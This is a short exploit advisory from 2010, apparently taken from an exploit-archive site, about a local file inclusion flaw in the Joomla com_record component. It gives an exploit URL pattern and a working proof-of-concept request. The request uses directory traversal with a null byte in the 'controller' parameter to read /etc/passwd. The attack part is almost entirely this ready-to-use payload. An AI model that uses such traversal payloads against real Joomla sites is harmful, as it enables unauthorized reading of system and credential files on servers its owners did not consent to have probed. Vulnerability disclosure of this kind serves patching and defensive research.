Joomla com_record Local File Inclusion Vulnerability

Posted on 12 April 2010
====================================================
Joomla com_record Local File Inclusion Vulnerability
====================================================

================================================================================================================
 
 
  [o] Joomla Component Record Local File Inclusion Vulnerability
  
       Software : com_record
       Vendor   : http://dev.pucit.edu.pk/
       Download : http://dev.pucit.edu.pk/files/record.rar
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_record&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
 
 
================================================================================================================


# Inj3ct0r.com [2010-04-12]
TOP
Malware :

Last 20
Exploits :

Last 20